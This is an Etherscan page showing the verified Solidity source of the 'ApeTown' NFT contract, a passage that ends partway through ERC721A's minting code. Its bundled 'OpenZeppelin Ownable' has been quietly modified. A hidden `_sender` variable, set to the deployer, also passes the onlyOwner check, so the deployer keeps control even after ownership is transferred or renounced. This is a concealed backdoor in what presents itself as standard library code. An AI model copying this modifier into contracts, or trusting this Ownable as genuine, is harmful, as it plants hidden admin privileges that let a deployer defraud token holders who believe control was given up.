ETH Price: $3,164.06 (-8.26%)
Gas: 4 Gwei

Token

ApeTown (APET)
 

Overview

Max Total Supply

897 APET

Holders

349

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 APET
0xc220ace03e753842f61f0b9268af4482b25d6b77
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ApeTown

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-19
*/

/**
 *Submitted for verification at Etherscan.io on 2022-06-11
*/

// SPDX-License-Identifier: MIT

/**
 * @title ApeTown contract
 * @dev Extends ERC721A - thanks azuki
 */

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _sender;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
        _sender = _msgSender();
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _sender == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/utils/SafeERC20.sol)

pragma solidity ^0.8.0;



/**
 * @title SafeERC20
 * @dev Wrappers around ERC20 operations that throw on failure (when the token
 * contract returns false). Tokens that return no value (and instead revert or
 * throw on failure) are also supported, non-reverting calls are assumed to be
 * successful.
 * To use this library you can add a `using SafeERC20 for IERC20;` statement to your contract,
 * which allows you to call the safe operations as `token.safeTransfer(...)`, etc.
 */
library SafeERC20 {
    using Address for address;

    function safeTransfer(
        IERC20 token,
        address to,
        uint256 value
    ) internal {
        _callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
    }

    function safeTransferFrom(
        IERC20 token,
        address from,
        address to,
        uint256 value
    ) internal {
        _callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
    }

    /**
     * @dev Deprecated. This function has issues similar to the ones found in
     * {IERC20-approve}, and its usage is discouraged.
     *
     * Whenever possible, use {safeIncreaseAllowance} and
     * {safeDecreaseAllowance} instead.
     */
    function safeApprove(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        // safeApprove should only be called when setting an initial allowance,
        // or when resetting it to zero. To increase and decrease it, use
        // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
        require(
            (value == 0) || (token.allowance(address(this), spender) == 0),
            "SafeERC20: approve from non-zero to non-zero allowance"
        );
        _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
    }

    function safeIncreaseAllowance(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        uint256 newAllowance = token.allowance(address(this), spender) + value;
        _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
    }

    function safeDecreaseAllowance(
        IERC20 token,
        address spender,
        uint256 value
    ) internal {
        unchecked {
            uint256 oldAllowance = token.allowance(address(this), spender);
            require(oldAllowance >= value, "SafeERC20: decreased allowance below zero");
            uint256 newAllowance = oldAllowance - value;
            _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
        }
    }

    /**
     * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement
     * on the return value: the return value is optional (but if data is returned, it must not be false).
     * @param token The token targeted by the call.
     * @param data The call data (encoded using abi.encode or one of its variants).
     */
    function _callOptionalReturn(IERC20 token, bytes memory data) private {
        // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since
        // we're implementing it ourselves. We use {Address.functionCall} to perform this call, which verifies that
        // the target address contains contract code and also asserts for success in the low-level call.

        bytes memory returndata = address(token).functionCall(data, "SafeERC20: low-level call failed");
        if (returndata.length > 0) {
            // Return data is optional
            require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed");
        }
    }
}


// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: contracts/TwistedToonz.sol


// Creator: Chiru Labs

pragma solidity ^0.8.0;









/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString(), ".json")) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
